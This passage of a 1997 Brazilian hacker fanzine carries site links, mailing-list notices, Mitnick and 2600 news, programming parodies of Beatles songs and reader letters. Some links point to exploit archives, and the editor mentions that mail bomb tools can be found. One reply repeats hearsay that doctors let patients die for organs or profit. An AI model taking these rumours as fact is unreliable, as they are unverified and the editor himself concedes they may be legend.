  uxutl23b.zip  (960226) 227K  Unix-like utilities for DOS. Rel 2.3. 2of4
  uxutl23c.zip  (960226) 221K  Unix-like utilities for DOS. Rel 2.3. 3of4
  uxutl23d.zip  (960226) 160K  Unix-like utilities for DOS. Rel 2.3. 4of4
  uznix120.zip  (960226) 332K  UZfulnix v1.20: Unix-like utilities for MS-DOS
  zutils02.zip  (951016)  52K  Collection of tiny utils HD/file related, lock

Por ultimo, claro que e' besteira reclamar pra mim que so' tem DOS aqui..
Existem tambem subdiretorios especificos para WIN95, Win 3.11 .. nao to dizendo
que as pessoas devam ir atras e procurar ai'. Mas pode valer a pena. E'  uma forma de
garimpar informacao. Basta ir atras dos arquivos 00_index.txt da vida.
Ate mail bomb e fake mail se encontra.

DICAS DE SOFTWARES

Um amigo, especialista em cracks e coisas do genero, me contou de um cara
desesperado pra conseguir um jeito de usar estes softwares. Depois que li a
descricao do que faz esses trocos, achei que deveria juntar isso como dica.
Afinal, nem sempre eu tenho tempo de conhecer tudo. O Zip Folders parece
particularmente interessante.. nao sei onde se consegue nenhum, talvez no
www.shareware.com ou www.cdrom.com..

Wingroov 0.9ec executa midis

Vueprint 5.4 visualiza imagem e midis

Pica View 32 mostra telas em formato thumbs dentro do windows explorer...

Zip Folders 1.0 permite acessar pastas zipadas....

Thumbs 3.0 visualizador de imagens, com recursos de converter formatos

---------------------------------------------------------------------------

DICAS DE SITES MUITO, MAS MUITO INTERESSANTES..

http://www.alexa.com

http://www.iss.net/xforce/

http://www.altavista.magallanes.net/

http://www.datasoft.com.br/marconci/hack.htm

http://www.ntshop.net/security/exploits.htm

http://www.l0pht.com/

http://berlin.ccc.de/

http://oliver.efri.hr/~crv/security/bugs/NT/nt.html

http://www.ntmag.com/

http://www.ugu.com

http://lebeau.home.ml.org

http://www.savilltech.com/ntfaq.html

http://microlink.com.br/~buick/dragons.htm

http://www.xs4all.nl/~jojo/jogos

http://premium.microsoft.com/support/kb/articles/q150/7/34.asp

http://www.dicas-l.unicamp.br                     <---- Muiiito
interessante

---------------------------------------------------------------------------

Maquinas de busca em espanhol

Ole Ozu El otro Ozu Whom Where El Buscon El buscador magico Buscador de
Archivos

http://www.ole.es  Ole

http://www.ozu.com  Ozu

http://www.ozu.es    El otro Ozu

http://www.spanish.whomwhere.com   Whom Where

http://194.51.86.22   El Buscon

http://www.ctv.es/USERS/amartin       El buscador magico

http://www.filez.com/espanol2.html      Buscador de Archivos

Um acontecimento contra a liberdade de opiniao e expressao na Espanha

HTTP://ELCASO.VESATEC.COM/#prensa

---------------------------------------------------------------------------

Hacker-zines brasileiros

Estao saindo uma pa de novos zines. Acho isso legal pacas, ja que um dos
motivos que criei o Barata Eletrica e exatamente estimular o pessoal a
fazer coisa ainda melhor. O chato e que alguns estao simplesmente "puxando"
e "copiando" material de outros, algumas vezes ate assumindo como se fossem
autores da materia, isso quando nao inventam de "encher linguica" com lista
de serial numbers. Outra coisa que esta se tornando meio que habito e fazer
pagina na Geocities, que esta cacando e apagando paginas de todo mundo.
Todo mundo, literalmente. Se brincar, minha pagina nao esta la.  A
Geocities tirou.  Alguns zines sao ruins, nao tem outra palavra. Outros, da
pra ver que o cara ainda pode fazer algo legal.  E tem outros que o cara
teve uma otima ideia. Nao vou falar quais. O duro e sobreviver e continuar.
Tem zine que e famosissimo. Mas nao passou do numero 2 em mais de 6 meses.
Alias, tem varios nessa situacao.  A lista abaixo nao define nenhum
criterio de escolha e e provavel que tais paginas ja tenham sumido do mapa.
Fica o registro historico, provavelmente vao renascer em algum lugar.. Ah,
sim, ia me esquecendo: como tem zineiro ai que resolveu que meu fanzine nao
presta, vou fazer a vontade dele e nao sujar seu nome colocando ele aqui.

http://www.geocities.com/Paris/Metro/6720/       Conscience

http://www.geocities.com/Broadway/6721/index.html    Rato.br

http://www.geocities.com/SiliconValley/Way/8650/policy.html    Policy -
seguranca em Unix

http://www.geocities.com/Paris/Metro/6720/     Ezine Conscience

http://www.complex-x.net/kaotik/ptzine/index.htm      Fanzine de Portugal

---------------------------------------------------------------------------

                            Nova lista Hackers

Eu descobri um lugar onde qualquer um pode fazer sua propria lista e criei
outra lista hackers, desta vez com o nome de hackers.braz

Nao sei se vai ter o mesmo sucesso da anterior, que estava hospedada na
esquina-das-listas, que todo mundo sabe, ja era. Pra se inscrever, va ate o
url:   http://www.coollist.com   e se inscreva la na lista  hackers.braz
(nao confundir com a lista hackers, que tambem existe, tem alto volume de
correspondencia, mas ta cheia de wannabe e lammer, alem de ser em ingles).

Ao se inscrever, voce ira receber um email igual a este (mais ou menos)
pedindo pra voce mandar um reply de confirmacao:

> Date:
>         Thu, 25 Sep 1997 20:33:01 -0400 (EDT)
>     To:
>         fulano@rocketmail.com
>   From:
>         subscribe@coollist.com Add to Address Book
>  Subject:
>         Confirmation of Subscription
>
>
> We have recently been requested by you to subscribe to this
>
>                 List:
>
> Please confirm that you want to subscribe by replying to this message.
>
> If this subscription is unsolicited, simply delete this message.
>
> Thank you.
>
> ----------------------------------------------------
> Get a FREE Mailing List at http://208.141.98.157/
>
>
>

Para se desinscrever, manda email para unsubscribe@coollist.com
A resposta deve ser:

> Date:
>         Fri, 3 Oct 1997 23:48:09 -0400 (EDT)
>     To:
>         fulano@rocketmail.com
>   From:
>         unsubscribe@coollist.com Add to Address Book
>  Subject:
>         Unsubscribe Request
>
>
> To unsubscribe from a Coollist Mailing List, just reply
> to this message and enter the name or the email address of
> your list between the square brackets:
>
>         List: [   ]
>
> eg The address of the mailing list you post to
>
> Then enter an "X" in the box below:
>
>         [ ] UNSUBSCRIBE
>
> You will be unsubscribed instantly. Thank you.
> --------------------------------------------------------
> Get your FREE Mailing List. http://www.coollist.com
>
>
>
>
O que rola e que a pessoa querendo se desinscrever
coloca o nome da lista onde quer se desinscrever, tal como:

>         List: [hackers.braz   ]
>
> eg The address of the mailing list you post to
>
> Then enter an "X" in the box below:
>
>         [X] UNSUBSCRIBE

Tudo isso e manda o reply de volta. Ai voce esta fora
da lista.

A confirmacao de inscricao ou des-inscricao vem depois, como
por exemplo:

> Date:
>         Sun, 28 Sep 1997 08:56:17 -0400 (EDT)
>     To:
>         Fulano de Tal
>   From:
>         hackers.braz@coollist.com Add to Address Book
>  Subject:
>         You have been subscribed
>
>
> Note: This is an automated Response
>
> Congratulations! You have been subscribed to the hackers.braz list.
> To post to this list, just email your posting to
> "hackers.braz@coollist.com"
>
> To unsubscribe from this list, just send a blank email to:
>         unsubscribe@coollist.com
>
> If you did not ask to be subscribed, please send this email to
> nospam@coollist.com
>
> If you encounter any problems at all, email support@coollist.com
>
> Thank you and Have fun!
> ------------------------------------------------------
> Get your FREE Mailing List. http://www.coollist.com
>
>

Detalhe importante:
Esta lista pode ou nao se tornar uma sucessora da lista hackers. Tudo
depende de quem estiver afim de se inscrever ou nao. Eu considerava
a lista hackers como um ponto de encontro, onde todo mundo podia ter
uma chance de se comunicar. Espero que o pessoal entre nessa.

OUTRA LISTA HACKER(?)

Essa contribuicao veio de um leitor:

Majordomo@listserv.pegasus.com.br

subscribe hacker seu@email

---------------------------------------------------------------------------

LISTA CIBERCULTURA

Esta e uma lista criada por Andre Lemos, Prof da Faculdade de Comunicacao da Universidade
Federal da Bahia e tem como base a discussao de temas ligados a cultura Cyber (que nao e
exatamente a ver com a cultura hacker, e bom notar). Se voce tiver interesse em discutir
novas tecnologias, lances de cabeca, etc, tudo bem. Pedir cracks pra joguinho, perguntar
como se faz para atravessar uma FIREWALL, como se tornar um hacker, isso dai nao tem
absolutamente NADA a ver com a lista. Se voce tem alguma ideia sobre cultura cyber, esse
e o lugar para entender, tentar entender ou discutir..

Para se inscrever:

Enviar correio eletronico para listproc@ufba.br com o seguinte conteudo:

subscribe cibercultura  Seu-nome-fulano

Para se desinscrever:

Mesmo correio eletronico, outro conteudo:

unsubscribe cibercultura

Para ver informacões:

help, info, sei la.. o listproc devolve um arquivo em ingles com o funcionamento
da coisa toda, se eu estiver errado.

Para contribuir para a lista:

Correio eletronico para cibercultura@ufba.br

---------------------------------------------------------------------------

MITNICK NEWS

To: cypherpunks@toad.com
Subject: Mitnick Rings Bell

6 de novembro 1997, noticia da Digital Cellular Report:

O governo americano adota linha dura com Mitnick. Hacker americano pede ajuda.

Um "hacker" americano - Kevin David Mitnick - preencheu um pedido para ajuda
financeira para lutar por sua defesa, atraves de seu advogado, Donald  C Randolph
de Santa Monica, EUA. Atraves de Randolph, Mitnick esta clamando que o governo
americano esta procurando fazer dele um exemplo pela possessao de codigos de
acesso nao-autorizados a (fone) celular. O caso e particularmente importante para
o mercado norte-americano, onde fones celulares analogicos, ao inves de digitais,
sao norma.

Em uma das mais interessantes declaracões, Mitnick afirma ter sido mantido em
solitaria por 23 horas diarias, nu em uma cela de ar condicionado congelante por
8 meses e mandado para o chuveiro acorrentado. Talvez o aspecto mais intrigante
em todo o caso e o fato de que enquanto o governo americano nunca procurou provar
que Mitnick "faturou" de suas atividades de "hacker" - embora certamente pudesse
ter feito tal coisa atraves da "venda" de tempo online para terceiros. Ao inves
disso afirmam  que ele causou perdas de 80 milhões. Kevin certamente parece estar
pagando o preco por feitos nefastos, tendo ja gastado proximo de dois anos em
custodia, em cujo tempo foi proibido de fazer acesso a comunicacões sem fio,
software ou hardware. E'  dificil saber exatamente qual lado esta mais paranoico,
ja que Mitnick esta afirmando que sua sina e parte de um complo do governo
americano para afastar o escrutinio que concerne a regulamentacao tanto das
telecomunicacões como da internet.

http://www.kevinmitnick.com/

---------------------------------------------------------------------------

2600 - Hacker Quaterly - à beira do abismo

A ultima desgraca que esta rolando no pedaco e a noticia de que o mais
famoso fanzine de Hackers, o 2600-Hacker Quaterly, esta a beira da
falencia. A distribuidora do fanzine, (fazer o zine e uma coisa, vender por
todo o pais, e tarefa da distribuidora) brincou demais com a grana dos
caras e ... entraram em concordata ou coisa do genero. Os caras que
assumiram a empresa depois tambem brincaram um pouco e parece que a coisa
la vai mal. O Goldstein nao entrou em concordata, acha que da pra levar  a
empresa adiante, mas ta russa, a coisa. Se piorar, vai ser o terceiro
fanzine famoso a sair do ar, junto com o Hack-Tic e o Virus Report. Por
essas e outras que nao transformei o Barata Eletrica num evento comercial..
ou mesmo criar uma revista com nome real, menos maldito. Quem quiser
maiores informacões, da uma olhada no www.2600.com  . Minha opiniao e que o
cara vai se safar dessa, o dificil vai ser o pessoal fazer assinaturas por
uns tempos. A proxima edicao vai atrasar, isso ta avisado na pagina.

---------------------------------------------------------------------------

Encontros de Hackers em Sao Paulo, Rio e Belo Horizonte:

Em Sao Paulo, comecaram a acontecer, embora nao em horarios  e datas
regulares, encontros de hackers. Aqueles que se interessarem, esta  sendo
criada uma lista para a divulgacao desses encontros. Provavelmente vai
rolar na lista hackers.braz ou qualquer outra que estiver disponivel. Como
e que estao sendo? Bom, tem gente comparecendo e nao so wannabes. Mas como
de vez em quando pinta um "desencontro",  acho prematuro eu chegar aqui e
divulgar pagina tal, provedor tal, pelo simples fato que:

1) ainda acho cedo

2) esse fanzine fica em html, zip e txt por tudo quanto e' lugar do mundo.
Falar que bar tal ou pagina tal esta' acontecendo isso ou aquilo, e uma
verdadeira propaganda pra qualquer estabelecimento. Minha pagina no
geocities continua recebendo visitas, apesar de ser de outro cara, agora (
a Geocities resolveu detonar com minha pagina no SiliconValley/5620)

3) Quero fazer uma pagina com o local de encontros hackers no Brasil
inteiro. Vai fica na mesma pagina em que estiver os ultimos numeros do
Barata Eletrica.

4) Último. Quem e fussador, acaba descobrindo sozinho.

Aqueles em outros estados que quiserem que eu divulgue encontros (detalhe:
de preferencia a mocada que ja faz encontros 2600) me avisem.

---------------------------------------------------------------------------

Se os Beatles fossem programadores (contribuicao da lista de piadas)

      YESTERDAY
      Yesterday,
      All those backups seemed a waste of pay.
      Now my database has gone away.
      Oh I believe in yesterday.
      Suddenly,
      There's not half the files there used to be,
      And there's a milestone
      hanging over me
      The system crashed so suddenly.
      I pushed something wrong
      What it was I could not say.
      Now all my data's gone
      and I long for yesterday-ay-ay-ay.
      Yesterday,
      The need for back-ups seemed so far away.
      I knew my data was all here to stay,
      Now I believe in yesterday.
      ============================================
      Songs to program by...

            Eleanor Rigby
            -------------
      Eleanor Rigby
      Sits at the keyboard
      And waits for a line on the screen
      Lives in a dream
      Waits for a signal
      Finding some code
      That will make the machine do some more.
      What is it for?
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
      Guru MacKenzie
      Typing the lines of a program that no one will run;
      Isn't it fun?
      Look at him working,
      Munching some chips as he waits for the code to compile;
      It takes  a while...
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
      Eleanor Rigby
      Crashes the system and loses 6 hours of work;
      Feels like a jerk.
      Guru MacKenzie
      Wiping the crumbs off the keys as he types in the code;
      Nothing will load.
      All the lonely users, where do they all come from?
      All the lonely users, why does it take so long?
       ===================================

           Unix Man (Nowhere Man)
            --------
      He's a real UNIX Man
      Sitting in his UNIX LAN
      Making all his UNIX plans
      For nobody.
      Knows the blocksize from du(1)
      Cares not where /dev/null goes to
      Isn't he a bit like you
      And me?
      UNIX Man, please listen(2)
      My lpd(8) is missin'
      UNIX Man
      The wo-o-o-orld is at(1) your command.
      He's as wise as he can be
      Uses lex and yacc and C
      UNIX Man, can you help me At all?
      UNIX Man, don't worry
      Test with time(1), don't hurry
      UNIX Man
      The new kernel boots, just like you had planned.
      He's a real UNIX Man
      Sitting in his UNIX LAN
      Making all his UNIX  plans For nobody ...
      Making all his UNIX  plans For nobody.
       ==================================

            Something
            ---------
      Something in the way it fails,
      Defies the algorithm's logic!
      Something in the way it coredumps...
      I don't want to leave it now
      I'll fix this problem somehow
      Somewhere in the memory I know,
      A pointer's got to be corrupted.
      Stepping in the debugger will show me...
      I don't want to leave it now
      I'm too close to leave it now
      You're asking me can this code go?
      I don't know, I don't know...
      What sequence causes it to blow?
      I don't know, I don't know...
      Something in the initializing code?
      And all I have to do is think of it!
      Something in the listing will show me...
      I don't want to leave it now
      I'll fix this tonight I vow!

---------------------------------------------------------------------------

CORREIO ELETRÔNICO:

Subject: Criticas

Li sua materia, e esta e uma parte dela:

"Do jeito que esta a situagco i atualmente, i (ou vai ser) um perigo entrar
em coma num hospital qualquer. Sua carteira de identidade nco fala que vocj
faz parte daqueles que acreditam em "doar" seus orgcos. Midico pensa: "vai
custar X manter o cara vivo, mas fulano na fila precisando de um rim vai me
dar Y se o cara morrer". I lei. O fato de que o midico dispts de seus
orgcos possivelmente receber uma propina (nco sei se a classe midica ganha
pouco a ponto de pensar que vale a pena declarar a morte cerebral de alguim
para receber uma grana, isso i fruto da minha imaginagco) nco conta muito
diante do fato de que existe uma lei permitindo lances relativos."

Infelizmente, nao concordo com vc. O que vc escreveu ai em cima e muito
comprometedor. Uma denuncia dessas pode te causar muito problemas, com
certeza desnecessarios. Nao sou medico, fique tranquilo.

[..]

O caso do medico ai em cima e um deles. Vc vive defendendo a classe hacker.
Eu concordo. Mas, com uma materia dessas, vc nivel uma classe profissional
das mais exigidas senao a maior, como a imprensa faz quando aquele
adolescente poe fotos de sacanagem na pagina da Scottlan Yard. Ou quebra a
senha de uma cartao de credito de um terceiro. E olha que sao fatos
menores.

Nao vou dizer que nao existem erros. Pelo contrario, erros existem aos
montes. Muitos sao prejudiciais, sim. Mas nao posso concordar que seja
perigo entrar em coma em um hospital. A menos que existam crimes. E crimes
contra a vida, os maiores de todos. A identidade diz se a pessoa e doadora
ou nao. Violando isso, 1 crime. Deixando a pessoa morrer, 2 crimes.
Assassinato e quebra de juramento. A familia permitindo a aceitar propina,
o maior de todos, a sovinice, a ganancia. Ja tive familiares que lutaram
ate o fim pela vida de seus parentes. E, nao posso negar que muitos medicos
salvaram vidas, e se nao o conseguiram, tentaram ate o fim. Sou prova viva
disto.

[..]

Um grando abraco e espero poder me comunicar melhor com vc.

Fabiano B???

Resposta:

Bom, como dizia Jack (o estripador):  "vamos por partes".  Na maior parte
do texto eu nao acusei, eu sugeri a hipotese. Mesmo que a classe medica
resolvesse me processar nesse caso especifico por calunia e difamacao, ia
ser interessante. Porque nao sou o unico que aventou essa hipotese. Tem
gente muito mais capacitada do que eu.. Inclusive teve uma materia na
revista "Caros Amigos" (no 6, setembro 97)- uma entrevista com o autor do
livro "Mercado Humano - estudo bioetico da compra e venda  de partes do
corpo",  Volnei Garrafa Giovanni Berlinguer. Um dos entrevistadores, George
Bourdokan relatou ter feito 1 programa Globo-Reporter em 1980 sobre roubo
de orgaos em Botucatu, onde 1 moca acordou 1 mes depois sem as corneas. O
programa nao teria ido ao ar por ser "muito pesado". Eu ja respondi essa
carta em separado, mas se alguem mais ficou curioso por essa questao, vai
ai o fato de que nao tirei essa hipotese da minha cabeca, nem e ficcao
cientifica. Em varios casos, a pratica da medicina "pode" ser um crime que
compensa. Um exemplo muito pior e que nunca parei pra averiguar e que
varios casos de internacao na UTI sao desnecessarios: o paciente vai morrer
mesmo e pra tirar alguma grana da familia, os medicos falam que o caso
ainda tem chance de recuperacao. A assistente de enfermagem ou
instrumentadora (sei la, faz tanto tempo) que me falou isso, disse que o
pessoal chama a sala pra esses casos desenganados de "antecamara do
inferno". Entre eles, o pessoal do hospital. Claro que isso veio de alguem
que saiu da profissao, pode ser mentira ou caso isolado. Essa menina tambem
me falou que em nenhum hospital particular, se voce perguntar na recepcao,
medicos, etc.. existe uma sala para os desenganados. Claro, o paciente
desenganado nao precisa de UTI ou tratamentos caros que dao lucro pro
hospital. Porque o Brasil e um dos campeões de cesarianas? Vaidade? Nao so
isso, a cesaria e mais cara do que parto natural. Tambem ja ouvi falar de
varias lendas urbanas onde a moral e a mesma: o medico ganha mais para
amputar ate o joelho, do que so o pe... Ouvi isso de diferentes classes
sociais. Pode ser lenda. Mas ja vi na revista VEJA inclusive, reportagens
sobre "erros medicos" envolvendo transplantes. Houve um escandalo
internacional envolvendo esterilizacao forcada de doentes mentais na
Suecia. A China estaria vendendo orgaos de prisioneiros politicos
executados.  Se la fazem monstruosidades desse tipo, em paises do primeiro
e do terceiro  mundo, sera que nao fazem aqui?

---------------------------------------------------------------------------

CARTA DA GRANDE IMPRENSA

Subject: Re: Seguranca e hacking na Internet

D????? H?????? wrote:
>=20
> Caro Derneval,
>=20
> Sou um reporter do Caderno de Informarica da ????? de S.P. e estou
> trabalhando em uma materia sobre seguranca e hackers (sem nenhuma
> conotacao pejorativa) na Internet. Acho que seria interessante
> desmistificar para o usuario "newbie", ou "wannabe", ou simplismente
> domestico, o mundo do hacking na rede. Gostaria de poder trocar
> informacões com voce sobre o assunto. Caso isso nao seja possivel,
> responda-me o quanto antes. A reportagem sera capa da edicao do dia ??
> de ???????mbro.
>=20
> Se voce concordar, ficaria grato se voce respondesse às seguintes
> perguntas:
>=20
> 1. Para voce o que sao e quais as principais diferencas entre hackers e
> crackers? Seus perfis, etica e "modus operandi":
>=20
> 2. Do que um hacker (ou cracker) e capaz? Voce acha que sua capacid=
ade e
> superestimada? Ou e a seguranca das Intranets que e superestimada? As
> empresas estao preparadas? Os firewalls sao uma blindagem eficiente?
>=20
> 3. Quais as formas basicas de invasao? Telef=F4nica, via Internet, =
fisica,
> por meio da "engenharia social" etc...?
>=20
> 4. Qual a melhor seguranca para o usuario domestico?
>=20
> 5. Do que um hacker (ou cracker precisa)? Equipamento basico, de hard e
> soft, conhecimento de linguagens sistemas etc...
>=20
> 6. Quais sao os alvos mais vulneraveis? E os mais procurados?
>=20
> Se voce nao tiver tempo, ou paciencia, para me responder atraves de
> e-mail, seria possivel conversarmos pelo telefone para que eu obtivesse
> uma declaracao de sua parte? Ficaria muito grato pela colaboracao. Voce
> deve saber como e dificil conseguir um pronunciamento de qualquer um dos
> lados dessa questao.
>=20
> Agradeco,
>=20
> D???? H??????
> (reporter free-lancer
>  da ??????de ?. ?.)

RESPOSTA: Esta primeira carta da uma ideia de quais sao as intencões
da chamada "grande imprensa" em relacao ao assunto "HACKERS". Claro
que a resposta foi negativa, seguida da explicacao de que apenas
escrevo sobre o assunto. E "hacking" pra mim e explorar ao maximo
os recursos do computador. Esse tipo de coisa. Ai veio a segunda
carta. E com acentos, de novo (esse pessoal nao aprende.. nao se usa
acentuacao nem cedilha na internet). Ah, sim, e nao foi a unica
que recebi.

Vai abaixo o meu REPLY para o segundo convite para discutir o assunto:

Subject: Sua reportagem

>           Caro Derneval,
>
>           Entendo a sua relutancia em colaborar com a minha reportagem ante a
>           abordagem pejorativa do hacking e a sua trajetoria -para falar a verdade
>           eu nao esperava que voce sequer me respondesse com a ojeriza que
>           qualquer um do meio sente com jornalistas "fucando" o tema hacking (voce

Eu nao tenho condicoes de saber o que voce sentiu lendo o meu email. Mas
como pintou uma reportagem sobre "contra-ataque dos crackers" ate' entendo
sua  argumentacao.

>           ve a relacao?). Contudo acho que voce tambem deveria tentar ver as
>           coisas de onde estou...
>
>           Serei sincero ("quid pro quo", compreende?): sou um estudante de
>           ???????? de ?? anos que estou trabalhando ha cinco meses como
>           free-lancer do Caderno ????????? d? ????????? e nao sou nenhum graudo
>           de rabo preso com o establishment corporativo. Nao mantenho nenhum

???????? (vou te chamar desse jeito, nao sou bom para nomes),
Voce tem ?? anos a menos do que eu. Eu nunca te vi. Nao tenho razoes
para te odiar como pessoa. So' que, da mesma forma que foi relatado no
artigo la' da revista ????????, eu adquiri uma relutancia para conversar com
qualquer um do meio jornalistico. Pelo simples fato de que houve um
numero de reportagens sobre o assunto e a grande maioria esmagadora foi
de reportagens detonando com a imagem, para que eu vou assumir riscos?
Algumas das reportagens que detonaram, como "Confidencias de um Cracker",
teve gente me contatando antes. O editor passou para outra pessoa que
nao se importava em detonar e falar mal de hackers. A ???????? ?????
chegou ao cumulo de associar hackers com adolescentes chatos. Nao
senhor. Nao quero colaborar com isso. Ainda mais quando estou em pleno
processo de procurar emprego?

>           interesse em desvirtuar a imagem de um grupo que considero essencial
>           para que a informatica se preserve como um agente de livre-expressao.
>           Minha curiosidade por hacking veio muito antes de eu estar n? ?????? e
>           venho propondo esta pauta com meu editor por acreditar na sua
>           pertinencia para o usuario domestico diante das quetões de seguranca na
>           rede, e para desmistificar o papel do hacking. Voce tem toda razao
>           quanto aos preconceitos editoriais, mas apesar d? m??? chefe (? edit?r?
>           ???????? ??????) nao considerar a questao da mesma forma como eu el? esta
>           me dando carta-branca para trabalhar esta materia para a capa de um
>           caderno daqui a ??? ???????.

TUDO BEM. Hoje, a materia e' interessante. Voce sabia que houve uma
conferencia de Hackers e fabricantes de virus em outubro de 94? Uma
pusta duma conferencia de hackers la' na Argentina. Sabia que eu dei a
dica para um cara chamado ??????? ??????, que trabalha (va?) ai' onde voce
esta? Sabia que nao houve interesse nenhum dele nem antes nem depois em
OUVIR o que eu tinha pra falar, uma vez que fui um dos 3 brasileiros que
foi (isso, porque eu morava no mesmo conjunto habitacional que ele)? E'
culpa sua? Nao, nao e' culpa sua. To contando essa historia p. te
mostrar que quando alguem quer falar, a imprensa nao quer ouvir, ou
porque nao tem tempo, ou porque nao considera a materia como
interessante, nao ve publico para ela. (Por um outro lado, outro jornal
concorrente de voces felizmente tinha alguem que se interessou e saiu
algumas linhas do que rolou la' em Buenos Aires)
   Do meu ponto de vista, se voces(to falando a voce como representante
do seu jornal, entenda que ha' uma diferenca) nao se interessaram
por isso nem 94, nao se interessaram por isso em 95 quando fui para a
Inglaterra e fui em outra conferencia, nao se interessaram por isso em
agosto de 97, quando houve uma conferencia de hackers na Holanda (olha
as dicas) por que diabos eu deveria dar atencao a voces agora?

>           Apesar de ser um assunto tabu no meio
>           venho entrevistando diversos especialistas (hackers em certo sentido) em
>           informatica, seguranca em redes, computacao bancaria, direito digital e
>           grupos de hackers eticos, profissionais (gostaria de saber sua opiniao
>           sobre esta atividade). E e claro que esta pauta tambem abarca o angulo

Minha opiniao pessoal e' a que esta' no barata eletrica 16, no artigo
sobre hackers e a midia. Pra resumir, acho que tem algum anunciante de
firewall ou coisa do genero pagando p. ver uma materia dessas sair. E
mais, o pessoal que vai se auto proclamar hackers vai falar que "matam a
cobra e mostram o pau". Se brincar vai sair em letras bem miudinhas que
o Barata Eletrica nao procura estimular vandalismo eletronico. A parte
de vandalismo eletronico, provavelmente saira' em letras garrafais, com
algum titulo bem marcante e um monte de links para fazer mail-bombs e
coisa do genero.. duvido que publiquem que o NT 4.0 ta' cheio de furos
que permitem um provedor ser hackeado ou que o Linux (sistema
operacional preferido) e' bem mais estavel e compete como software para
provedor sem ter nenhuma propaganda alem do boca-a-boca.

>           do adolescente vandalo (que nao e o mesmo que um hacker de fato, ao meu
>           ver), mas se estou entrando em contato com voce nao foi por associa-lo
>           com este perfil mas por respeito ao trabalho que o seu zine fez em
>           divulgar a cultura underground do hacking no Brasil, o que mereceu o
>           reconhecimento da 2600 americana.

Claro que mereceu. Por varias razões que nao vem ao caso.
Foi por saber que a imprensa nao teria interesse
no assunto que acabei fazendo o primeiro fanzine brasileiro na Internet,
era a Agencia Estado, Agencia Folha e Barata Eletrica na lista de
publicacoes brasileiras na web. Por bem mais de 6 meses. Nunca ninguem
d? ???????? teve interesse em me entrevistar por conta disso. Fizeram acho
que duas ou tres  materias sobre fanzines nacionais desde que comecei o
Barata Eletrica. So' na ultima e' que o Barata Eletrica foi mencionado.
E ainda assim erraram o URL. Voce tem culpa disso? Nao, nao e' culpa
sua.

>           Nao estou lhe dando este esclarecimento para tentar demove-lo de sua
>           posicao -que, de certo modo, acho coerente- mas para que voce nao pense
>           que todos os jornalistas -mesmo um lammer inexperiente como eu-
>           trabalham de ma-fe. A impresa nao e so o meio onipresente e hegemenico
>           que voce enxerga de seu lado, mas caras pacatos, curiosos, "fucadores"
>           bem-intencionados, que estao tentando fazer algo autentico e construtivo
>           e que muitas vezes nao tem o poder para faze-lo.

Eu confio tanto na imprensa quanto confio num colega hacker. Acho que
todo mundo trabalha de boa fe', garantindo o salario no final do mes.

>           O que quero dizer e que talvez voce tenha um lugar nessa questao e que
>           se voce acha que todas as reportagens com esse tema sao estupidas, bem,
>           talvez em certos casos tenha sido pela falta da colaboracao de todas as
>           pessoas envolvidas...

No meu caso, tenho a consciencia limpa. Parei de colaborar depois que vi
as sacanagens que estava ajudando a fazer. A imprensa e' bem menos
imparcial que apregoa. E todo editor fala que o reporter tem carta pra
branca pra escrever o que quiser.. parece ate' que voce nao leu "O crime
do Padre Amaro". Eu nao vou acreditar no que voce falar acerca disso..

>           De qualquer maneira parabens pelo BE (quando sai um proximo numero?).
>

Em um mes, mais ou menos.
>           Caso voce mude de ideia, responda este e-mail ou me ligue n? ??????
>           (011-????????????), das 13h às 19h -no contato por voz da para se saber
>           melhor com quem se esta lidando.
>

Seu email ta' guardado. Sem ressentimentos.

Quanto a usar o nome Barata Eletrica ou informacoes contidas, nele, fica
livre qualquer referencia, nao to nem ai'. Quiser divulgar os links do
Barata igualmente. Mas que fique claro que hackear para o Barata
Eletrica e' conseguir acesso a informacao e explorar os limites da
capacidade do computador. E' isso o que considero hacking e e' disso que
falo no BE embora comente o computer underground.

Valeu.
>           Um abraco,
>
>      ??????? ???????

P.S. Quando eu finalmente fizer meu encontro de hackers ou achar que
finalmente a imprensa nao esta mais usando os hackers como forma de
explorar o assunto "vandalismo eletronico", ficarei feliz de ajudar
qualquer reporter (que nao me queira retratar como hacker ou como vandalo
eletronico).  Tenho o maior respeito pela imprensa, quando cumpre o seu
papel.

---------------------------------------------------------------------------

From: "Luis Marcilio B.Oliveira" <marcilio@arcom.com.br>
Subject: Re: Os wannabes de hoje e os de antigamente

Luis Marcilio B.Oliveira wrote:

> v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v^v
>
> Ola Derneval.
>
> To te escrevendo pra comentar um pensamento que tive quando relia as
> primeiras edicoes do BE.
>
> O que eu acho e que hoje as coisas estao faceis demais. Os micros estao
> muito poderosos e nao temos muita dificuldade mais para conseguir que as
> coisas rodem.
>
> Isso as vezes me desanima um pouco.
>
> Nao temos mais a necessidade de ficar "indo fundo" no dos porque o dos nao
> usa mais, nem ficar turbinando os micros, ja que fazer upgrade de memoria
> ficou tao facil.
>
> Nao temos por que querer "enganar" a tarifacao da central telefonica para
> acessar um bbs interessante, ja que todas estao disponiveis na Internet,
> sem falar nos programinhas que as vezes vem ate compilados.
>
> Nao estou dizendo que aprender por aprender nao seja interesante, mas como
> diz o ditado: a necessidade eh a mae da criatividade.
>
> Nao sou um hacker. Pelo que escrevi acima da pra perceber. Me falta
> justamente o que escrevi acima. *Necessidade*.
>
> Tenho certeza que voce tem mais conhecimentos para comentar sobre o
> assunto, portanto ficaria feliz em receber uma resposta.
>
> Um abraco
>
> Luis Marcilio
>
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.3ia
>
> mQBNAzR0YnUAAAECANiPz456+QRyhqbb++PkuwvDIqw78dXvyB7vTbbD1A+Tcknb
> AFvPMkIKNDxFU9wpswv//VV5bk2SB8uvLUhbamEABRG0CG1hcmNpbGlviQBVAwUQ
> NHRidQfLry1IW2phAQE+IwH/RsJj0ajVBXuxpGroluxlEPy3KeRg5uLmOrHZ7GAh
> kwF75o6C4e/uvZP1cx5sSZ/ReF0JTpx7MYQHNI6VvE5z7g==
> =FQUO
> -----END PGP PUBLIC KEY BLOCK-----

E', esse problema tambem me acontece.. tinha ate' um artigo sobre isso
na 2600. Aconteceu comigo, inclusive. Eu arrumei um emprego onde acabei
montando um servidor. Vou brincar de hackear outro servidor pra que?
Pro outro sysop avisar pro meu patrao e me demitir? Agora to desempregado,
mas nao me cortaram as contas, entao o problema continua..

Nao sei o que responder. Meu desafio agora e' arrumar 1 emprego. Talvez
quando eu voltar a mexer com o Linux, reencontre os grandes desafios.

Valeu.

assinado: Derneval


